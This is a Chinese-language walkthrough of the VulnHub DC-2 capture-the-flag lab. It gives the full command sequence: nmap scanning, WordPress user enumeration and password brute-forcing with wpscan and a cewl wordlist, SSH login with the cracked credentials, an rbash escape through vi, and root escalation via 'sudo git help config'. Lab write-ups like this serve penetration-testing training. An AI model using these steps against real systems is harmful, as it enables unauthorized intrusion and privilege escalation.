靶机下载地址:https://www.vulnhub.com/entry/dc-2,311/
Kaili IP:192.168.70.129
靶机ip:192.168.70.162
一、信息搜集
进行靶机ip发现和目标的端口扫描
sudo arp-scan -l
nmap -A -p 0-65535 192.168.70.162
二、域名解析
开放了80端口和用于ssh连接的7744端口
访问80端口,可以看出做了域名解析,所以需要在本地即kali的配置文件/etc/hosts文件写入,192.168.70.162 dc-2即可完成本地域名解析。
成功访问页面后,在页面直接看到flag1
三、暴力破解
告诉我们,应该使用cewl生成字典,登陆后就会看到下一个flag
cewl生成字典命令:
cewl http://dc-2 -w ycx.txt
使用dirb对网站目录进行扫描,发现有wp-admin,猜测应该是使用wordpress搭建的
dirb http://192.168.70.162
再使用wpscan对网站进行扫描,附上wpscan的使用教程
https://cloud.tencent.com/developer/article/1684063
wpscan的使用
这里使用-e u来枚举用户名
wpscan –url http://dc-2 -e u
将检测到的三个用户名写入yyy.txt 之后使用wpscan进行账号密码扫描,这里也可以使用burpsuit
wpscan --url http://dc-2/ --usernames /home/ycx/Desktop/yyy.txt --passwords /home/ycx/Desktop/ycx.txt
这里扫描出来连个账号密码
jerry adipiscing
tom parturient
这里使用jerry的密码成功登录网站
在pages中看到flag2
利用扫描到的7744端口
四、建立连接
进行ssh连接
ssh tom@192.168.70.162 -p 7744
登陆成功查看flag3,发现cat被拒绝使用,cd也是拒绝的,使用vi可以查看。
vi flag3.txt
五、rbash逃逸
发现rbash拒绝使用一些命令,关于rbash的介绍文章
https://www.freebuf.com/articles/system/188989.html
rbash简介:受限制的外壳或 rbash,顾名思义是一个类似于 bash, 但不同之处在于它有很多限制来避免用户采取某些操作。它用于安全目的 bash,但具有额外的安全层来实施这些限制
简单点就是不让你使用一些危险命令
使用:
:set shell=/bin/sh
:shell
或者用/bin/bash
成功绕过rbash
在vi中按下esc,输入第一条命令,回车,在输入第二条即可
切换完成之后还要添加环境变量。给$PATH变量增加两个路径,用来查找命令
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/
在jerry的home目录下发现flag4
提示git
切换用户到jerry:su jerry
六、提权
使用git提权
直接在命令行中输入以下命令,即可提权。
sudo git help config #在末行命令模式输入
!/bin/bash 或 !'sh' #完成提权
